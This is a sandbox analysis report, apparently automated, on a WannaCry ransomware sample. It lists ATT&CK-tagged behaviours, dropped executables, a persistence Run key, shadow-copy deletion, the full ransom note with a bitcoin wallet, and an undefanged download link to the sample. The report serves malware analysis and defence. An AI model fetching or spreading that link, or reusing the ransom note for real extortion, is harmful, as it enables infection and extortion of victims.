wannacry | hxxps://gofile[.]io/d/LOwIP7

Resubmissions

30-10-2024 08:40

241030-kkx47szemq 8

30-10-2024 08:25

241030-ka9p9aykbv 10

30-10-2024 08:22

241030-j9nrdsyjhs 6

30-10-2024 08:19

241030-j7vf6a1kbq 6

Analysis

max time kernel
661s
max time network
663s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
30-10-2024 08:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/LOwIP7

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDA733.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDA73A.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 53 IoCs

pid	Process
2976	taskdl.exe
2728	@[email protected]
1684	@[email protected]
1840	taskhsvc.exe
5316	taskdl.exe
5336	taskse.exe
5344	@[email protected]
5788	taskdl.exe
5808	taskse.exe
5820	@[email protected]
6000	taskse.exe
6004	@[email protected]
6024	taskdl.exe
2052	@[email protected]
3696	taskse.exe
6004	taskdl.exe
5752	taskse.exe
5572	@[email protected]
5548	taskdl.exe
5824	taskse.exe
5720	@[email protected]
5868	taskdl.exe
5152	taskse.exe
1860	@[email protected]
5628	taskdl.exe
4688	Install VALORANT.exe
1400	Install VALORANT.exe
6128	taskse.exe
2856	@[email protected]
5948	taskdl.exe
2372	Install VALORANT.exe
5084	Install VALORANT.exe
468	taskse.exe
740	@[email protected]
5892	taskdl.exe
6120	taskse.exe
2260	@[email protected]
5984	taskdl.exe
1776	taskse.exe
1660	@[email protected]
244	taskdl.exe
3652	taskse.exe
3744	@[email protected]
5240	taskdl.exe
5256	taskse.exe
2356	@[email protected]
2380	taskdl.exe
5240	taskse.exe
6084	@[email protected]
232	taskdl.exe
4300	taskse.exe
6124	@[email protected]
3128	taskdl.exe

Loads dropped DLL 8 IoCs

pid	Process
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4976	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tgikesyrkli880 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
79	raw.githubusercontent.com
12	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\rescache\_merged\425634766\2411608373.pri	LogonUI.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Install VALORANT.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Winword.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Winword.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "14"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133747508526033236"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 7 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5412	reg.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Install VALORANT.exe:Zone.Identifier	chrome.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
4944	vlc.exe
1676	Winword.exe
1676	Winword.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
3588	msedge.exe
3588	msedge.exe
2280	msedge.exe
2280	msedge.exe
3368	identity_helper.exe
3368	identity_helper.exe
3648	msedge.exe
3648	msedge.exe
1436	msedge.exe
1436	msedge.exe
1436	msedge.exe
1436	msedge.exe
3244	msedge.exe
3244	msedge.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
1840	taskhsvc.exe
5672	chrome.exe
5672	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4944	vlc.exe
4996	OpenWith.exe
5344	@[email protected]

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 54 IoCs

pid	Process
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	3020	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3020	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	768	WMIC.exe
Token: SeSecurityPrivilege	768	WMIC.exe
Token: SeTakeOwnershipPrivilege	768	WMIC.exe
Token: SeLoadDriverPrivilege	768	WMIC.exe
Token: SeSystemProfilePrivilege	768	WMIC.exe
Token: SeSystemtimePrivilege	768	WMIC.exe
Token: SeProfSingleProcessPrivilege	768	WMIC.exe
Token: SeIncBasePriorityPrivilege	768	WMIC.exe
Token: SeCreatePagefilePrivilege	768	WMIC.exe
Token: SeBackupPrivilege	768	WMIC.exe
Token: SeRestorePrivilege	768	WMIC.exe
Token: SeShutdownPrivilege	768	WMIC.exe
Token: SeDebugPrivilege	768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	768	WMIC.exe
Token: SeRemoteShutdownPrivilege	768	WMIC.exe
Token: SeUndockPrivilege	768	WMIC.exe
Token: SeManageVolumePrivilege	768	WMIC.exe
Token: 33	768	WMIC.exe
Token: 34	768	WMIC.exe
Token: 35	768	WMIC.exe
Token: 36	768	WMIC.exe
Token: SeIncreaseQuotaPrivilege	768	WMIC.exe
Token: SeSecurityPrivilege	768	WMIC.exe
Token: SeTakeOwnershipPrivilege	768	WMIC.exe
Token: SeLoadDriverPrivilege	768	WMIC.exe
Token: SeSystemProfilePrivilege	768	WMIC.exe
Token: SeSystemtimePrivilege	768	WMIC.exe
Token: SeProfSingleProcessPrivilege	768	WMIC.exe
Token: SeIncBasePriorityPrivilege	768	WMIC.exe
Token: SeCreatePagefilePrivilege	768	WMIC.exe
Token: SeBackupPrivilege	768	WMIC.exe
Token: SeRestorePrivilege	768	WMIC.exe
Token: SeShutdownPrivilege	768	WMIC.exe
Token: SeDebugPrivilege	768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	768	WMIC.exe
Token: SeRemoteShutdownPrivilege	768	WMIC.exe
Token: SeUndockPrivilege	768	WMIC.exe
Token: SeManageVolumePrivilege	768	WMIC.exe
Token: 33	768	WMIC.exe
Token: 34	768	WMIC.exe
Token: 35	768	WMIC.exe
Token: 36	768	WMIC.exe
Token: SeBackupPrivilege	5140	vssvc.exe
Token: SeRestorePrivilege	5140	vssvc.exe
Token: SeAuditPrivilege	5140	vssvc.exe
Token: SeTcbPrivilege	5336	taskse.exe
Token: SeTcbPrivilege	5336	taskse.exe
Token: SeTcbPrivilege	5808	taskse.exe
Token: SeTcbPrivilege	5808	taskse.exe
Token: SeTcbPrivilege	6000	taskse.exe
Token: SeTcbPrivilege	6000	taskse.exe
Token: SeTcbPrivilege	3696	taskse.exe
Token: SeTcbPrivilege	3696	taskse.exe
Token: SeShutdownPrivilege	5672	chrome.exe
Token: SeCreatePagefilePrivilege	5672	chrome.exe
Token: SeShutdownPrivilege	5672	chrome.exe
Token: SeCreatePagefilePrivilege	5672	chrome.exe
Token: SeShutdownPrivilege	5672	chrome.exe
Token: SeCreatePagefilePrivilege	5672	chrome.exe
Token: SeShutdownPrivilege	5672	chrome.exe
Token: SeCreatePagefilePrivilege	5672	chrome.exe
Token: SeShutdownPrivilege	5672	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe

Suspicious use of SendNotifyMessage 43 IoCs

pid	Process
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
2280	msedge.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
4944	vlc.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe
5672	chrome.exe

Suspicious use of SetWindowsHookEx 56 IoCs

pid	Process
2728	@[email protected]
2728	@[email protected]
1684	@[email protected]
1684	@[email protected]
5344	@[email protected]
5344	@[email protected]
5820	@[email protected]
4944	vlc.exe
6004	@[email protected]
3140	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
1676	Winword.exe
1676	Winword.exe
1676	Winword.exe
1676	Winword.exe
1676	Winword.exe
1676	Winword.exe
1676	Winword.exe
1676	Winword.exe
1676	Winword.exe
2052	@[email protected]
5572	@[email protected]
5720	@[email protected]
1860	@[email protected]
2856	@[email protected]
740	@[email protected]
2260	@[email protected]
1660	@[email protected]
3744	@[email protected]
2356	@[email protected]
6084	@[email protected]
6124	@[email protected]
3060	LogonUI.exe
3060	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 4468	2280	msedge.exe	80
PID 2280 wrote to memory of 4468	2280	msedge.exe	80
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 2716	2280	msedge.exe	81
PID 2280 wrote to memory of 3588	2280	msedge.exe	82
PID 2280 wrote to memory of 3588	2280	msedge.exe	82
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
